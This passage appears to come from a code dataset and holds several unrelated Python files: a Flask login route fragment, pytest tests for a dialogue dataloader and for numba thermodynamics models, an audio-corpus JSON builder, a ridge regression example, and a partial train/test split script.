리다이렉트\n if login_check(request.args.get('id'), request.args.get('pwd')):\n return render_template('output.html', id = id, pwd = pwd, status = 'logged in')\n # return 'success'\n else:\n return render_template('output.html', id = id, pwd = pwd, status = 'log in fail')\n # return 'fail'\n \n # return render_template('login_test.html', id=temp, pwd=temp1)\n ## else 로 하지 않은 것은 POST, GET 이외에 다른 method로 넘어왔을 때를 구분하기 위함\n\n# '/table/'+hisnet_id # is it possible?\n# prints out the information from hisnet by the table\n\nif __name__ == '__main__':\n # threaded=True 로 넘기면 multiple plot이 가능해짐\n # app.run(debug=True, threaded=True\n app.run(host=\"0.0.0.0\", port=5000)\n\n","sub_path":"main/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"517756979","text":"import copy\n\nimport pytest\nfrom pytest_mock import mocker\nimport random\nimport operator\nfrom cotk.dataloader import SingleTurnDialog, OpenSubtitles\nfrom cotk.metric import MetricBase\n\nfrom version_test_base import base_test_version\n\n\ndef setup_module():\n\timport random\n\trandom.seed(0)\n\timport numpy as np\n\tnp.random.seed(0)\n\nclass TestSingleTurnDialog():\n\tdef base_test_init(self, dl):\n\t\tassert isinstance(dl, SingleTurnDialog)\n\t\tassert isinstance(dl.ext_vocab, list)\n\t\tassert dl.ext_vocab[:4] == [\"\", \"\", \"\", \"\"]\n\t\tassert [dl.pad_id, dl.unk_id, dl.go_id, dl.eos_id] == [0, 1, 2, 3]\n\t\tassert isinstance(dl.key_name, list)\n\t\tassert dl.key_name\n\t\tfor word in dl.key_name:\n\t\t\tassert isinstance(word, str)\n\t\tassert isinstance(dl.all_vocab_list, list)\n\t\tassert dl.vocab_list[:len(dl.ext_vocab)] == dl.ext_vocab\n\t\tassert isinstance(dl.word2id, dict)\n\t\tassert len(dl.word2id) == len(dl.all_vocab_list)\n\t\tassert dl.vocab_size == len(dl.vocab_list)\n\t\tfor i, word in enumerate(dl.all_vocab_list):\n\t\t\tassert isinstance(word, str)\n\t\t\tassert dl.word2id[word] == i\n\t\tassert dl.all_vocab_size == len(dl.all_vocab_list)\n\t\tfor key in dl.key_name:\n\t\t\tpost = dl.data[key]['post']\n\t\t\tresp = dl.data[key]['resp']\n\t\t\tassert len(post) == len(resp)\n\t\t\tassert isinstance(post[0], list)\n\t\t\tassert isinstance(resp[0], list)\n\t\t\tassert post[0][0] == dl.go_id\n\t\t\tassert post[0][-1] == dl.eos_id\n\t\t\tassert resp[0][0] == dl.go_id\n\t\t\tassert resp[0][-1] == dl.eos_id\n\n\t\t# assert the data has valid token\n\t\tassert dl.vocab_size > 4\n\t\t# assert the data has invalid token\n\t\tassert dl.all_vocab_size > dl.vocab_size\n\n\tdef base_test_all_unknown(self, dl):\n\t\t# if invalid_vocab_times very big, there is no invalid words.\n\t\tassert dl.vocab_size == dl.all_vocab_size\n\n\tdef base_test_restart(self, dl):\n\t\twith pytest.raises(ValueError):\n\t\t\tdl.restart(\"unknown set\")\n\t\tfor key in dl.key_name:\n\t\t\twith pytest.raises(ValueError):\n\t\t\t\tdl.restart(key)\n\t\t\trecord_index = copy.copy(dl.index[key])\n\t\t\tdl.restart(key, batch_size=3, shuffle=False)\n\t\t\tassert record_index == dl.index[key]\n\t\t\tassert dl.batch_id[key] == 0\n\t\t\tassert dl.batch_size[key] == 3\n\t\t\trng_state_st = random.getstate()\n\t\t\tdl.restart(key, shuffle=True)\n\t\t\trng_state_ed = random.getstate()\n\t\t\tassert operator.eq(rng_state_st, rng_state_ed)\t\t\t\n\t\t\tassert dl.batch_id[key] == 0\n\t\t\trecord_index = copy.copy(dl.index[key])\n\t\t\tdl.restart(key, shuffle=False)\n\t\t\tassert record_index == dl.index[key]\n\t\t\tassert dl.batch_id[key] == 0\n\n\tdef base_test_get_batch(self, dl):\n\t\twith pytest.raises(ValueError):\n\t\t\tdl.get_batch(\"unknown set\", [0, 1])\n\t\tfor key in dl.key_name:\n\t\t\twith pytest.raises(IndexError):\n\t\t\t\tlength = len(dl.data[key]['post'])\n\t\t\t\tdl.get_batch(key, [length-1, length])\n\t\t\tassert len(dl.index[key]) >= 2\n\t\t\tbatch = dl.get_batch(key, [0, 1])\n\t\t\tassert len(batch[\"post_length\"]) == 2\n\t\t\tassert len(batch[\"resp_length\"]) == 2\n\t\t\tassert batch[\"post\"].shape[0] == 2\n\t\t\tassert batch[\"resp\"].shape[0] == 2\n\n\t\t\tfor sent, length in [(\"post\", \"post_length\"), (\"resp\", \"resp_length\")]:\n\t\t\t\tfor idx in [0, 1]:\n\t\t\t\t\tif batch[length][idx] < batch[sent].shape[1]:\n\t\t\t\t\t\tassert batch[sent][idx][batch[length][idx]-1] == dl.eos_id\n\t\t\t\t\tassert batch[sent][idx][0] == dl.go_id\n\n\t\t# this is true, only when there is no unknown words in dl\n\t\t# (Only valid & invalid words)\n\t\tflag = False\n\t\tfor key in dl.key_name:\n\t\t\tlength = len(dl.data[key]['post'])\n\t\t\tfor i in range(length):\n\t\t\t\tbatch = dl.get_batch(key, [i])\n\t\t\t\tassert dl.unk_id not in batch[\"post_allvocabs\"]\n\t\t\t\tassert dl.unk_id not in batch[\"resp_allvocabs\"]\n\t\t\t\tbatch = dl.get_batch(key, [i])\n\t\t\t\tif dl.unk_id in batch[\"post\"] or \\\n\t\t\t\t\tdl.unk_id in batch[\"resp\"]:\n\t\t\t\t\tflag = True\n\t\tassert flag\n\n\tdef base_test_get_next_batch(self, dl):\n\t\twith pytest.raises(ValueError):\n\t\t\tdl.get_next_batch(\"unknown set\")\n\n\t\tfor key in dl.key_name:\n\t\t\twith pytest.raises(RuntimeError):\n\t\t\t\tdl.get_next_batch(key)\n\n\t\t\tdl.restart(key, 7)\n\t\t\tsample_num = 0\n\t\t\twhile True:\n\t\t\t\tbatch = dl.get_next_batch(key, ignore_left_samples=True)\n\t\t\t\tif not batch:\n\t\t\t\t\tbreak\n\t\t\t\tassert batch[\"post\"].shape[0] == 7\n\t\t\t\tsample_num += batch[\"post\"].shape[0]\n\t\t\tassert sample_num + 7 >= len(dl.data[key][\"post\"])\n\n\t\t\tdl.restart(key, 7)\n\t\t\tsample_num = 0\n\t\t\twhile True:\n\t\t\t\tbatch = dl.get_next_batch(key)\n\t\t\t\tassert batch is not None # dummy dataset must not be multiple of 7\n\t\t\t\tif batch[\"post\"].shape[0] == 7:\n\t\t\t\t\tsample_num += 7\n\t\t\t\telse:\n\t\t\t\t\tsample_num += batch[\"post\"].shape[0]\n\t\t\t\t\tbatch = dl.get_next_batch(key)\n\t\t\t\t\tassert not batch\n\t\t\t\t\tbreak\n\t\t\tassert sample_num == len(dl.data[key][\"post\"])\n\n\tdef base_test_convert(self, dl):\n\t\tsent_id = [0, 1, 2]\n\t\tsent = [\"\", \"\", \"\"]\n\t\tassert sent == dl.convert_ids_to_tokens(sent_id)\n\t\tassert sent_id == dl.convert_tokens_to_ids(sent)\n\n\t\tsent = [\"\", \"\", \"\", \"\", \"\", \"\"]\n\t\tsent_id = [1, 2, 0, 1, 0, 2]\n\t\tassert sent_id == dl.convert_tokens_to_ids(sent)\n\t\tassert sent_id == dl.convert_tokens_to_ids(sent, invalid_vocab=True)\n\n\t\tsent = [dl.all_vocab_list[dl.vocab_size]]\n\t\tassert [1] == dl.convert_tokens_to_ids(sent)\n\t\tassert [dl.vocab_size] == dl.convert_tokens_to_ids(sent, invalid_vocab=True)\n\n\n\t\tsent_id = [0, 1, 2, 0, 0, 3, 1, 0, 0]\n\t\tsent = [\"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\"]\n\t\tassert sent == dl.convert_ids_to_tokens(sent_id, trim=False)\n\t\tsent = [\"\", \"\", \"\"]\n\t\tassert sent == dl.convert_ids_to_tokens(sent_id)\n\n\t\tsent_id = [0, 0, 3]\n\t\tsent = [\"\", \"\", \"\"]\n\t\tassert sent == dl.convert_ids_to_tokens(sent_id, trim=False)\n\t\tassert not dl.convert_ids_to_tokens(sent_id)\n\n\t\tsent_id = [3, 3, 3]\n\t\tsent = [\"\", \"\", \"\"]\n\t\tassert sent == dl.convert_ids_to_tokens(sent_id, trim=False)\n\t\tassert not dl.convert_ids_to_tokens(sent_id)\n\n\t\tsent_id = [0, 0, 0]\n\t\tsent = [\"\", \"\", \"\"]\n\t\tassert sent == dl.convert_ids_to_tokens(sent_id, trim=False)\n\t\tassert not dl.convert_ids_to_tokens(sent_id)\n\n\tdef base_test_teacher_forcing_metric(self, dl):\n\t\tassert isinstance(dl.get_teacher_forcing_metric(), MetricBase)\n\n\tdef base_test_teacher_inference_metric(self, dl):\n\t\tassert isinstance(dl.get_inference_metric(), MetricBase)\n\n\tdef base_test_multi_runs(self, dl_list):\n\t\tassert all(x.vocab_list == dl_list[0].vocab_list for x in dl_list)\n\n@pytest.fixture\ndef load_opensubtitles():\n\tdef _load_opensubtitles(invalid_vocab_times=0):\n\t\treturn OpenSubtitles(\"./tests/dataloader/dummy_opensubtitles#OpenSubtitles\", invalid_vocab_times=invalid_vocab_times)\n\treturn _load_opensubtitles\n\nclass TestOpenSubtitles(TestSingleTurnDialog):\n\n\t@pytest.mark.dependency()\n\tdef test_init(self, load_opensubtitles):\n\t\tsuper().base_test_init(load_opensubtitles())\n\t\tsuper().base_test_all_unknown(load_opensubtitles(10000))\n\n\tdef test_restart(self, load_opensubtitles):\n\t\tsuper().base_test_restart(load_opensubtitles())\n\n\t@pytest.mark.dependency(depends=[\"TestOpenSubtitles::test_init\"])\n\tdef test_get_batch(self, load_opensubtitles):\n\t\tsuper().base_test_get_batch(load_opensubtitles())\n\n\t@pytest.mark.dependency(depends=[\"TestOpenSubtitles::test_init\"])\n\tdef test_get_next_batch(self, load_opensubtitles):\n\t\tsuper().base_test_get_next_batch(load_opensubtitles())\n\n\t@pytest.mark.dependency(depends=[\"TestOpenSubtitles::test_init\"])\n\tdef test_convert(self, load_opensubtitles):\n\t\tsuper().base_test_convert(load_opensubtitles())\n\n\tdef test_teacher_forcing_metric(self, load_opensubtitles):\n\t\tsuper().base_test_teacher_forcing_metric(load_opensubtitles())\n\n\tdef test_teacher_inference_metric(self, load_opensubtitles):\n\t\tsuper().base_test_teacher_inference_metric(load_opensubtitles())\n\n\tdef test_init_multi_runs(self, load_opensubtitles):\n\t\tsuper().base_test_multi_runs([load_opensubtitles() for i in range(3)])\n\n\nbase_test_version(OpenSubtitles)\n","sub_path":"tests/dataloader/test_single_turn_dialog.py","file_name":"test_single_turn_dialog.py","file_ext":"py","file_size_in_byte":7753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"128174892","text":"# Importing Dependencies \nimport csv\nimport os \nimport re\nimport json\nimport wave\nfrom numpy import random\nfrom sys import argv, exit\nfrom tqdm import tqdm\n\n# Function to calculate duration of audio file\ndef get_audio_duration(audio_path):\n audio = wave.open(audio_path)\n duration = float(audio.getnframes()) / audio.getframerate()\n audio.close()\n return duration\n\n# Main Function \ndef main(data_directory):\n # Open tsv file\n transcript_path = os.path.join(data_directory, \"utt_spk_text_clean.tsv\")\n transcript= open(transcript_path, \"r\")\n transcript_reader=csv.reader(transcript, delimiter=\"\\t\" )\n \n file_names=list()\n labels=list()\n\n # Check and drop lines containing numbers\n for row in transcript_reader:\n file_names.append(row[0])\n labels.append(row[2])\n\n transcript.close()\n\n # Bind file name and corresponding label\n zipped_list = list(zip(file_names, labels))\n sorted_zip = sorted(zipped_list, key = lambda x: x[0]) \n\n paths = list()\n texts = list()\n durations= list()\n\n for file_name, label in tqdm(sorted_zip):\n # For file name beginning with 0-7, Audio_0_7 directory \n if re.match(\"(^[0-7])\", file_name):\n audio_path=os.path.join(data_directory, \"Audio_0_7\", file_name+\".wav\")\n duration=get_audio_duration(audio_path)\n paths.append(audio_path)\n durations.append(duration)\n texts.append(label)\n # Else, directory Audio_8_f\n else:\n audio_path=os.path.join(data_directory,\"Audio_8_f\", file_name+\".wav\")\n duration=get_audio_duration(audio_path)\n paths.append(audio_path)\n durations.append(duration)\n texts.append(label)\n\n # Dump contents randomly into two json\n size = len(paths)\n print(size)\n \n fv = open(\"valid_corpus.json\", \"w\")\n ft = open(\"train_corpus.json\", \"w\")\n fm = open(\"main_corpus.json\", \"w\")\n threshold = int(0.2 * size)\n while(True):\n distribution = random.binomial(n=1, p=0.2, size=size)\n\n if list(distribution).count(1)==threshold:\n for index, value in enumerate(distribution):\n line = json.dumps({'key': paths[index],'duration':durations[index],'text': texts[index]}, ensure_ascii=False)\n fm.write(line+\"\\n\")\n if value==1:\n fv.write(line +\"\\n\")\n else:\n ft.write(line + \"\\n\")\n \n fv.close()\n ft.close()\n fm.close()\n break\n\n# Main function call\nif __name__ == \"__main__\":\n if len(argv) !=2:\n print(\"Error in command, exiting...\")\n exit()\n data_directory = argv[1]\n main(data_directory)\n\n","sub_path":"create_desc_json.py","file_name":"create_desc_json.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"337336928","text":"# -*- coding: utf-8 -*-\n\"\"\"Chemical Engineering Design Library (ChEDL). Utilities for process modeling.\nCopyright (C) 2020 Caleb Bell \n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\"\"\"\n\nfrom __future__ import division\nfrom thermo import *\nimport thermo\nfrom math import *\nfrom random import random\nfrom fluids.constants import *\nfrom fluids.numerics import assert_close, assert_close1d, assert_close2d, assert_close3d\nfrom numpy.testing import assert_allclose\nfrom chemicals import normalize\nfrom thermo.test_utils import check_np_output_activity\n\nimport pytest\ntry:\n import numba\n import thermo.numba\n import numba.core\nexcept:\n numba = None\nimport numpy as np\n\n\ndef swap_funcs_and_test(names, substitutions, test):\n '''\n names : list[str]\n object names to switch out\n substitutions : list[obj]\n Objects to put in\n test : function\n Unit test to run in the file\n '''\n originals = {}\n glob = test.__globals__\n for name, sub in zip(names, substitutions):\n originals[name] = glob[name]\n glob[name] = sub\n try:\n test()\n except Exception as e:\n glob.update(originals)\n raise e\n glob.update(originals)\n\ndef mark_as_numba(func):\n func = pytest.mark.numba(func)\n func = pytest.mark.skipif(numba is None, reason=\"Numba is missing\")(func)\n return func\n\n@mark_as_numba\ndef test_PRMIX_outputs_inputs_np():\n kwargs = dict(Tcs=[190.56400000000002, 305.32, 369.83, 126.2],\n Pcs=[4599000.0, 4872000.0, 4248000.0, 3394387.5],\n omegas=[0.008, 0.098, 0.152, 0.04],\n zs=[.1, .2, .3, .4],\n kijs=[[0.0, -0.0059, 0.0119, 0.0289], [-0.0059, 0.0, 0.0011, 0.0533], [0.0119, 0.0011, 0.0, 0.0878], [0.0289, 0.0533, 0.0878, 0.0]])\n kwargs_np = {k:np.array(v) for k, v in kwargs.items()}\n\n from thermo.numba import PRMIX as PRMIXNP\n\n eos = PRMIX(T=200, P=1e5, **kwargs)\n eos_np = PRMIXNP(T=200, P=1e5, **kwargs_np)\n\n base_vec_attrs = ['a_alphas', 'da_alpha_dTs', 'd2a_alpha_dT2s', 'a_alpha_roots', 'a_alpha_j_rows', 'da_alpha_dT_j_rows', 'lnphis_l', 'phis_l', 'fugacities_l', 'lnphis_g', 'phis_g', 'fugacities_g']\n extra_vec_attrs = ['db_dzs', 'db_dns', 'dnb_dns', 'd2b_dzizjs', 'd2b_dninjs', 'd3b_dzizjzks', 'd3b_dninjnks', 'd3epsilon_dzizjzks', 'da_alpha_dzs', 'da_alpha_dns', 'dna_alpha_dns', 'd2a_alpha_dzizjs']\n alpha_vec_attrs = ['_a_alpha_j_rows', '_da_alpha_dT_j_rows', 'a_alpha_ijs', 'da_alpha_dT_ijs', 'd2a_alpha_dT2_ijs']\n # TODO: _d2a_alpha_dT2_j_rows, and _a_alpha_j_rows', '_da_alpha_dT_j_rows with .to methods\n\n for attr in base_vec_attrs + extra_vec_attrs + alpha_vec_attrs:\n assert_close1d(getattr(eos, attr), getattr(eos_np, attr), rtol=1e-14)\n assert type(getattr(eos, attr)) is list\n assert type(getattr(eos_np, attr)) is np.ndarray\n\n\ndef test_IdealSolution_np_out():\n from thermo import IdealSolution\n from thermo.numba import IdealSolution as IdealSolutionnp\n model = IdealSolution(T=300.0, xs=[.1, .2, .3, .4])\n modelnp = IdealSolutionnp(T=300.0, xs=np.array([.1, .2, .3, .4]))\n modelnp2 = modelnp.to_T_xs(T=310.0, xs=np.array([.2, .2, .2, .4]))\n\n check_np_output_activity(model, modelnp, modelnp2)\n\n\ndef test_Wilson_numpy_output():\n T = 331.42\n N = 3\n\n from thermo.numba import Wilson as Wilsonnp\n A = [[0.0, 3.870101271243586, 0.07939943395502425],\n [-6.491263271243587, 0.0, -3.276991837288562],\n [0.8542855660449756, 6.906801837288562, 0.0]]\n B = [[0.0, -375.2835, -31.1208],\n [1722.58, 0.0, 1140.79],\n [-747.217, -3596.17, -0.0]]\n D = [[-0.0, -0.00791073, -0.000868371],\n [0.00747788, -0.0, -3.1e-05],\n [0.00124796, -3e-05, -0.0]]\n\n C = E = F = [[0.0]*N for _ in range(N)]\n\n xs = [0.229, 0.175, 0.596]\n\n model = thermo.wilson.Wilson(T=T, xs=xs, ABCDEF=(A, B, C, D, E, F))\n modelnp = Wilsonnp(T=T, xs=np.array(xs), ABCDEF=(np.array(A), np.array(B), np.array(C), np.array(D), np.array(E), np.array(F)))\n modelnp2 = modelnp.to_T_xs(T=T, xs=np.array(xs))\n\n check_np_output_activity(model, modelnp, modelnp2)\n\ndef test_NRTL_numpy_output():\n NRTLnp = thermo.numba.nrtl.NRTL\n alphas = [[[0.0, 2e-05], [0.2937, 7e-05], [0.2999, 0.0001]],\n [[0.2937, 1e-05], [0.0, 4e-05], [0.3009, 8e-05]],\n [[0.2999, 1e-05], [0.3009, 3e-05], [0.0, 5e-05]]]\n\n taus = [[[6e-05, 0.0, 7e-05, 7e-05, 0.00788, 3.6e-07],\n [3e-05, 624.868, 9e-05, 7e-05, 0.00472, 8.5e-07],\n [3e-05, 398.953, 4e-05, 1e-05, 0.00279, 5.6e-07]],\n [[1e-05, -29.167, 8e-05, 9e-05, 0.00256, 1e-07],\n [2e-05, 0.0, 7e-05, 6e-05, 0.00587, 4.2e-07],\n [0.0, -35.482, 8e-05, 4e-05, 0.00889, 8.2e-07]],\n [[9e-05, -95.132, 6e-05, 1e-05, 0.00905, 5.2e-07],\n [9e-05, 33.862, 2e-05, 6e-05, 0.00517, 1.4e-07],\n [0.0001, 0.0, 6e-05, 2e-05, 0.00095, 7.4e-07]]]\n\n N = 3\n T = 273.15+70\n dT = T*1e-8\n xs = [.2, .3, .5]\n model = NRTL(T, xs, taus, alphas)\n modelnp = NRTLnp(T=T, xs=np.array(xs), tau_coeffs=np.array(taus), alpha_coeffs=np.array(alphas))\n modelnp2 = modelnp.to_T_xs(T=T, xs=np.array(xs))\n\n check_np_output_activity(model, modelnp, modelnp2)\n\ndef test_UNIQUAC_numpy_output():\n UNIQUACnp = thermo.numba.uniquac.UNIQUAC\n\n N = 3\n T = 331.42\n xs = [0.229, 0.175, 0.596]\n rs = [2.5735, 2.87, 1.4311]\n qs = [2.336, 2.41, 1.432]\n # madeup numbers to match Wilson example roughly\n tausA = [[0.0, -1.05e-4, -2.5e-4], [3.9e-4, 0.0, 1.6e-4], [-1.123e-4, 6.5e-4, 0]]\n tausB = [[0.0, 235.0, -169.0], [-160, 0.0, -715.0], [11.2, 144.0, 0.0]]\n tausC = [[0.0, -4.23e-4, 2.9e-4], [6.1e-4, 0.0, 8.2e-5], [-7.8e-4, 1.11e-4, 0]]\n tausD = [[0.0, -3.94e-5, 2.22e-5], [8.5e-5, 0.0, 4.4e-5], [-7.9e-5, 3.22e-5, 0]]\n tausE = [[0.0, -4.2e2, 8.32e2], [2.7e2, 0.0, 6.8e2], [3.7e2, 7.43e2, 0]]\n tausF = [[0.0, 9.64e-8, 8.94e-8], [1.53e-7, 0.0, 1.11e-7], [7.9e-8, 2.276e-8, 0]]\n ABCDEF = (tausA, tausB, tausC, tausD, tausE, tausF)\n ABCDEFnp = tuple(np.array(v) for v in ABCDEF)\n\n model = UNIQUAC(T=T, xs=xs, rs=rs, qs=qs, ABCDEF=ABCDEF)\n modelnp = UNIQUACnp(T=T, xs=np.array(xs), rs=np.array(rs), qs=np.array(qs), ABCDEF=ABCDEFnp)\n modelnp2 = modelnp.to_T_xs(T=T, xs=np.array(xs))\n\n check_np_output_activity(model, modelnp, modelnp2)\n\n@mark_as_numba\ndef test_UNIFAC_numpy_output():\n from thermo.unifac import DOUFIP2006, DOUFSG\n\n UNIFACnp = thermo.numba.unifac.UNIFAC\n N = 4\n T = 373.15\n xs = [0.2, 0.3, 0.1, 0.4]\n chemgroups = [{9:6}, {78:6}, {1:1, 18:1}, {1:1, 2:1, 14:1}]\n model = thermo.unifac.UNIFAC.from_subgroups(T=T, xs=xs, chemgroups=chemgroups, version=1,\n interaction_data=DOUFIP2006, subgroups=DOUFSG)\n\n\n modelnp = UNIFACnp.from_subgroups(T=T, xs=np.array(xs), chemgroups=chemgroups, version=1,\n interaction_data=DOUFIP2006, subgroups=DOUFSG)\n modelnp2 = modelnp.to_T_xs(T=T, xs=np.array(xs))\n\n check_np_output_activity(model, modelnp, modelnp2)\n\n json_string = modelnp.as_json()\n new = UNIFACnp.from_json(json_string)\n assert new == modelnp\n\n\n\n\n@mark_as_numba\ndef test_a_alpha_aijs_composition_independent_in_all():\n assert 'a_alpha_aijs_composition_independent' in thermo.numba.__all__\n\n\n@mark_as_numba\ndef test_a_alpha_aijs_composition_independent():\n # TODO: a_alpha_aijs_composition_independent is being overwritten in thermo.numba somehow!\n\n kijs = np.array([[0,.083],[0.083,0]])\n a_alphas = np.array([0.2491099357671155, 0.6486495863528039])\n a0, a1, a2 = thermo.numba.eos_mix_methods.a_alpha_aijs_composition_independent(a_alphas, kijs)\n assert type(a0) is np.ndarray\n assert type(a1) is np.ndarray\n assert type(a2) is np.ndarray\n\n b0, b1, b2 = thermo.eos_mix_methods.a_alpha_aijs_composition_independent(a_alphas, kijs)\n assert_close1d(a1, b1, rtol=1e-13)\n assert_close2d(a0, b0, rtol=1e-13)\n assert_close2d(a2, b2, rtol=1e-13)\n\n assert thermo.numba.eos_mix_methods.a_alpha_aijs_composition_independent is not thermo.eos_mix_methods.a_alpha_aijs_composition_independent\n\n\n\n@mark_as_numba\ndef test_a_alpha_and_derivatives_full():\n kijs = np.array([[0,.083],[0.083,0]])\n zs = np.array([0.1164203, 0.8835797])\n a_alphas = np.array([0.2491099357671155, 0.6486495863528039])\n da_alpha_dTs = np.array([-0.0005102028006086241, -0.0011131153520304886])\n d2a_alpha_dT2s = np.array([1.8651128859234162e-06, 3.884331923127011e-06])\n a_alpha, da_alpha_dT, d2a_alpha_dT2, a_alpha_ijs, da_alpha_dT_ijs, d2a_alpha_dT2_ijs = thermo.numba.a_alpha_and_derivatives_full(a_alphas=a_alphas, da_alpha_dTs=da_alpha_dTs, d2a_alpha_dT2s=d2a_alpha_dT2s, T=299.0, zs=zs, kijs=kijs)\n\n a_alpha0, da_alpha_dT0, d2a_alpha_dT20, a_alpha_ijs0, da_alpha_dT_ijs0, d2a_alpha_dT2_ijs0 = thermo.eos_mix_methods.a_alpha_and_derivatives_full(a_alphas=a_alphas, da_alpha_dTs=da_alpha_dTs, d2a_alpha_dT2s=d2a_alpha_dT2s, T=299.0, zs=zs, kijs=kijs)\n\n\n assert_close(a_alpha, a_alpha0, rtol=1e-13)\n assert_close(da_alpha_dT, da_alpha_dT0, rtol=1e-13)\n assert_close(d2a_alpha_dT2, d2a_alpha_dT20, rtol=1e-13)\n\n assert_close1d(a_alpha_ijs, a_alpha_ijs0, rtol=1e-13)\n assert_close1d(da_alpha_dT_ijs, da_alpha_dT_ijs0, rtol=1e-13)\n assert_close1d(d2a_alpha_dT2_ijs0, d2a_alpha_dT2_ijs, rtol=1e-13)\n\n\n@mark_as_numba\ndef test_IAPWS95_numba():\n assert isinstance(thermo.numba.flash.Psat_IAPWS, numba.core.registry.CPUDispatcher)\n assert isinstance(thermo.numba.phases.IAPWS95._d3Ar_ddeltadtau2_func, numba.core.registry.CPUDispatcher)\n\n from thermo.numba import IAPWS95, IAPWS95Liquid, IAPWS95Gas, FlashPureVLS\n\n liquid = IAPWS95Liquid(T=300, P=1e5, zs=[1])\n gas = IAPWS95Gas(T=300, P=1e5, zs=[1])\n flasher = FlashPureVLS(iapws_constants, iapws_correlations, gas, [liquid], [])\n\n assert_close(flasher.flash(T=1000,P=1e4).H(), 71901.67235666412, rtol=1e-8) # TP\n assert_close(flasher.flash(P=1e5, V=.1).T, 1202.8504507662728, rtol=1e-8) # PV\n assert_close(flasher.flash(T=1000, V=.1).P, 83126.1092778793, rtol=1e-8) # TV\n\n assert_close(flasher.flash(P=1e5,VF=1).T, 372.7559288971221, rtol=1e-8) # PVF\n assert_close(flasher.flash(T=300, VF=.5).P, 3536.806752274638, rtol=1e-8) # TVF\n# assert_close(flasher.flash(P=1e4, H=71901.67235666412).T, 1000, rtol=1e-8) # PH - not working yet\n\n\n\n@mark_as_numba\ndef test_RegularSolution_numba():\n N = 20\n xs = normalize([random() for _ in range(N)])\n xs2 = normalize([random() for _ in range(N)])\n SPs = [50000.0*random() for _ in range(N)]\n Vs = [1e-5*random() for _ in range(N)]\n\n\n T = 300.0\n lambda_coeffs = [[random()*1e-4 for _ in range(N)] for _ in range(N)]\n\n GE = RegularSolution(T, xs, Vs, SPs, lambda_coeffs)\n xsnp = np.array(xs)\n xs2np = np.array(xs2)\n Vsnp = np.array(Vs)\n SPsnp = np.array(SPs)\n lambda_coeffsnp = np.array(lambda_coeffs)\n\n GE = RegularSolution(T, xsnp, Vsnp, SPsnp, lambda_coeffsnp)\n GE.gammas()\n GE.to_T_xs(T=T+1.0, xs=xs2np).gammas()\n\n assert_close1d(GE.d2GE_dTdxs(), [0.0]*N, atol=0)","sub_path":"tests/test_numba.py","file_name":"test_numba.py","file_ext":"py","file_size_in_byte":12107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"363480764","text":"\"\"\"\nAlg: ridge regression\n\nmin_{x} ||Ax-b||_{2}^{2} + alpha||x||_{2}^{2}\n-------------------------------------\n# Author: JohnB\n\"\"\"\n\nimport numpy as np\nfrom sklearn import linear_model\nfrom sklearn.metrics import mean_squared_error, r2_score\n\n\nreg = linear_model.Ridge(alpha=1,fit_intercept=True,normalize=True,random_state=0,tol=1e-5)\nx_train = [[0, 0], [0, 0], [1, 1]]\ny_train = [0, .1, 1]\n\nx_test = [[0,0],[2,2]] \ny_test = [0,2]\n\nreg.fit(x_train, y_train) \ny_hat = reg.predict(x_test)\n\n\ncoefs = reg.intercept_, reg.coef_\nmse = mean_squared_error(y_test, y_hat)\nr2 = r2_score(y_test, y_hat)\n\nprint(\"coefs:\",coefs)\nprint(\"mse: %.2f\"% mse)\nprint('R2 : %.2f'% r2)\n\n","sub_path":"algs/Reg_Ridge_l2/Reg_Ridge.py","file_name":"Reg_Ridge.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"388753226","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 10 09:19:09 2018\n\n@author: Frank\n\"\"\"\nimport os\nimport numpy as np\nimport pandas as pd\nimport random\nos.chdir(r'C:\\Users\\Frank\\Desktop\\Design_final')\n\n#将所有���据放到一起\ndef dataOutput():\n os.chdir(r'C:\\Users\\Frank\\Desktop\\Design_final\\dataset')\n fileNameVec=['HL07','HWFET','IM240','LA92','REP05','SC03','UDDS','UNIF01','US06']\n dataAll=pd.DataFrame()\n for fileName in fileNameVec:\n data=pd.read_csv('seg_frame_'+fileName+'.csv')\n dataAll=pd.concat([dataAll,data],ignore_index=True)\n dataAll['seg_index']=range(dataAll.iloc[:,0].size)\n dataLength=dataAll.iloc[:,0].size\n print(dataAll)\n dataAll.to_csv('data_All.csv',index=False)\n #生成训练集和测试集数据\n trainDataIndex=[]\n labels=['FLA', 'FLB', 'FLC', 'FLD', 'FLE', 'FLF', 'FR', 'ALA', 'ALC', 'ALE', 'LR']\n for label in labels:\n indexAll=list(dataAll[dataAll['label']==label].index)\n trainDataIndexTemp=random.sample(indexAll,int(len(indexAll)*0.8))\n trainDataIndex.extend(trainDataIndexTemp)\n #trainDataIndex=random.sample(range(dataLength),int(dataLength*0.8))\n testDataIndex=list(set(range(dataLength))-set(trainDataIndex))\n \n# trainDataIndex=random.sample(range(dataLength),int(dataLength*0.2))\n# testDataIndex=random.sample(range(dataLength),int(dataLength*0.05))\n trainData=dataAll.loc[trainDataIndex]\n testData=dataAll.loc[testDataIndex]\n del 